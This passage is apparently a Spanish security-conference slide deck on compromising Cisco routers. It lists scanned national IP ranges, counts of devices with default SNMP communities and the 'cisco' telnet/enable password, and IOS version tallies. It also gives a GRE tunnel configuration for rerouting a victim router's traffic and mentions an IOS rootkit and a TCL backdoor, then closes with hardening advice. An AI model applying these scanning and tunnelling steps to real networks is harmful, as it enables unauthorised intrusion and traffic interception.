  • 11. 157.100.0.0/16 190.12.32.0/19 190.154.0.0/17 192.207.40.0/24 200.12.169.0/24 200.105.224.0/20 186.0.144.0/21 190.15.128.0/20 190.154.128.0/17 192.207.41.0/24 200.12.196.0/22 200.105.240.0/20 186.3.0.0/18 190.52.64.0/20 190.155.0.0/17 192.207.42.0/24 200.14.34.0/24 200.107.0.0/19 186.3.64.0/18 190.52.192.0/20 190.155.128.0/17 192.207.65.0/24 200.14.83.0/24 200.107.32.0/19 186.3.128.0/17 190.57.128.0/18 190.214.0.0/17 192.207.66.0/24 200.16.94.0/24 200.107.248.0/21 186.4.128.0/17 190.94.128.0/19 190.214.128.0/17 192.207.67.0/24 200.24.192.0/19 200.110.64.0/20 186.5.0.0/17 190.95.128.0/19 192.188.44.0/24 192.207.68.0/24 200.25.128.0/19 200.110.80.0/20 186.42.0.0/17 190.95.160.0/19 192.188.45.0/24 192.207.244.0/24 200.25.160.0/19 200.110.112.0/20 186.42.128.0/17 190.95.192.0/19 192.188.46.0/24 200.0.28.0/22 200.25.192.0/20 200.110.232.0/21 186.43.128.0/18 190.95.224.0/19 192.188.47.0/24 200.0.63.0/24 200.25.208.0/20 200.115.32.0/20 1.698.560 186.46.0.0/17 190.96.96.0/21 192.188.48.0/24 200.0.73.0/24 200.29.240.0/21 200.124.224.0/20 186.46.128.0/17 190.99.72.0/21 192.188.49.0/24 200.0.74.0/24 200.49.240.0/21 200.124.240.0/20 186.47.0.0/16 190.107.64.0/20 192.188.50.0/24 200.0.75.0/24 200.50.232.0/21 200.125.128.0/20 186.65.0.0/18 190.107.232.0/21 192.188.51.0/24 200.0.76.0/24 200.55.224.0/20 200.125.144.0/20 186.66.0.0/17 190.108.64.0/21 192.188.52.0/24 200.0.77.0/24 200.55.248.0/21 200.125.192.0/19 186.66.128.0/17 190.110.192.0/19 192.188.53.0/24 200.0.78.0/24 200.63.192.0/19 200.125.224.0/19 186.68.0.0/15 190.111.64.0/20 192.188.54.0/24 200.1.6.0/24 200.63.224.0/20 200.126.0.0/19 186.70.0.0/15 190.120.64.0/20 192.188.55.0/24 200.1.161.0/24 200.63.240.0/20 201.217.64.0/19 186.101.0.0/16 190.120.80.0/20 192.188.56.0/24 200.1.172.0/24 200.69.160.0/20 201.217.96.0/19 186.178.0.0/16 190.123.0.0/20 192.188.57.0/24 200.7.83.0/24 200.69.176.0/20 201.218.0.0/19 190.8.180.0/22 190.123.48.0/20 192.188.58.0/24 200.7.192.0/19 200.73.200.0/21 201.218.32.0/19 190.9.160.0/20 190.130.128.0/17 192.188.59.0/24 200.7.224.0/19 200.85.80.0/21 201.219.0.0/19 190.9.176.0/20 190.131.0.0/18 192.188.60.0/24 200.9.96.0/24 200.90.152.0/21 201.219.32.0/19 190.10.128.0/18 190.131.64.0/18 192.188.194.0/24 200.9.176.0/24 200.93.192.0/19 201.238.128.0/19 190.10.192.0/18 190.131.128.0/18 192.188.195.0/24 200.9.248.0/24 200.93.224.0/20 201.238.160.0/20 190.11.0.0/19 190.152.0.0/17 192.188.196.0/24 200.10.147.0/24 200.93.248.0/21 201.238.176.0/20 190.12.0.0/19 190.152.128.0/17 192.188.197.0/24 200.10.148.0/22 200.105.112.0/21
  • 12. Errar es Humano, ¿Perdonar es Divino? - SNMP por Default - Contraseñas Débiles - Vulnerabilidades - Protocolos
  • 13. SNMP Simple Network Management Protocol
  • 14. SNMP Simple Network Management Protocol • Versiones: SNMPv1 - SNMPv2 - SNMPv3 • MIB: Base de Información de Administración • Comunidad = Contraseña - “public” = comunidad de lectura - “private” = comunidad de escritura
  • 15.
  • 16. DEMO Tripper.pl by @KFS
  • 17. SNMP Scanning - Public - Private
  • 18. Total = 1.695.560 SNMP “default” = 5.925 0% - Public = 5.465 - Private = 460 100% SNMP Default
  • 19. OTROS = 4.713 CISCO = 1.212 20% 80% Dispositivos Cisco
  • 20. 11.2(16)P = 1 12.3(3a) = 2 12.0(11) = 1 12.3(3g) = 1 12.0(28b) = 2 12.3(8)YG4 = 1 12.0(5.4)WC(1) = 2 12.3(8)YI3 = 12 12.4(10) = 1 Versiones de IOS 12.0(7) = 2 12.0(7)T = 5 12.4(10b) = 4 12.1(27b) = 1 12.4(11)T = 4 12.1(5)T10 = 2 12.4(11)XW7 = 1 12.1(5)T8 = 1 12.4(12a) = 3 12.1(8c) = 1 12.4(15)T4 = 46 12.2(15)T = 1 12.4(15)T5 = 79 12.2(15)T17 = 1 12.4(15)T7 = 7 700 12.2(17) = 1 12.4(15)T9 = 11 12.4(18) = 3 12.2(1a) = 4 12.2(25)SEA = 1 12.4(19) = 168 12.2(25)SEB4 = 1 12.4(19b) = 8 12.2(25)SEE2 = 29 12.4(1a) = 3 12.2(25)SEE3 = 1 12.4(1c) = 11 12.2(33)SB5 = 254 12.4(20)T2 = 4 525 12.2(33)SRA = 71 12.4(20)T5 = 1 12.4(24)T = 57 12.2(33)SRC3 = 144 12.2(33)SRD3 = 135 12.4(24)T1 = 7 12.2(4)YH = 2 12.4(24)T2 = 2 12.2(55)SE = 1 12.4(24)T4 = 1 12.2(6a) = 1 12.4(3g) = 3 12.2(8)YN = 1 12.4(3h) = 4 350 12.3(11)T = 2 12.4(3i) = 3 12.4(4)T8 = 8 12.3(11)T10 = 1 12.3(11)T2 = 6 12.4(6)T11 = 9 12.3(11)T3 = 1 12.4(6)T7 = 1 12.3(12c) = 1 15.0(1)M2 = 48 12.3(16) = 2 15.0(1)M3 = 5 12.3(22) = 1 15.0(1)M4 = 4 175 12.3(23) = 3 15.0(1)M5 = 1 15.0(1)M7 = 4 12.3(26) = 1 15.1(2)T4 = 1 0 11.2 12.0 12.1 12.2 12.3 12.4 15.0 15.1
  • 21. 12.2 • Fin de Venta • Fin de Mantenimiento
  • 22. TELNET Default Password: “cisco”
  • 23. CISCO SNMP = 1.212 TELNET “cisco” = 29 1% 99% TELNET con “cisco”
  • 24. TELNET “cisco” = 29 ENABLE “cisco” = 13 31% 69% ENABLE con “cisco”
  • 25. DEMO getCISCO by @KFS
  • 28. ataque a protocolos IRPAS “Internetwork Routing Protocol Attack Suite” Protocolos soportados: • CDP • IRDP • IGRP • EIGRP (discovery) • RIPv1 (discovery) • RIPv2 (discovery) http://www.phenoelit-us.org/ • OSPF (discovery) • HSRP • DHCP DORA • ICMP Redirects
  • 30.
  • 32. Cisco DEMO! interface Tunnel2 ip address 2.2.2.1 255.255.255.0 tunnel source [Publica_Linux] tunnel destination [Publica_Cisco] tunnel mode gre ip Linux modprobe ip_gre ip tunnel add a_VICTIMA_2 mode gre remote [Publica_Cisco] local [Publica_Linux] ttl 255 ip link set a_VICTIMA_2 up ip addr add 2.2.2.2 dev a_VICTIMA_2 ip route add 2.2.2.0/24 dev a_VICTIMA_2
  • 33. DIK “DA IOS ROOTKIT” Sebastian 'topo' Muñiz
  • 35. TCL Backdoor • Necesita “ENABLE” • IOS 12.2(25) S, 12.3(2) T • Funciona en otras versiones... • “tclsh” DEMO!
  • 36. Recomendaciones • Actualizar el Software • Deshabilitar Servicios No Usados • Bloquear el Tráfico • Segmentar la Red de Administración • Correlacionar Logs @base4sec
  • 37. ¿preguntas? @base4sec
  • 38. GRACIAS!! @KFS KUNGFOOSION.com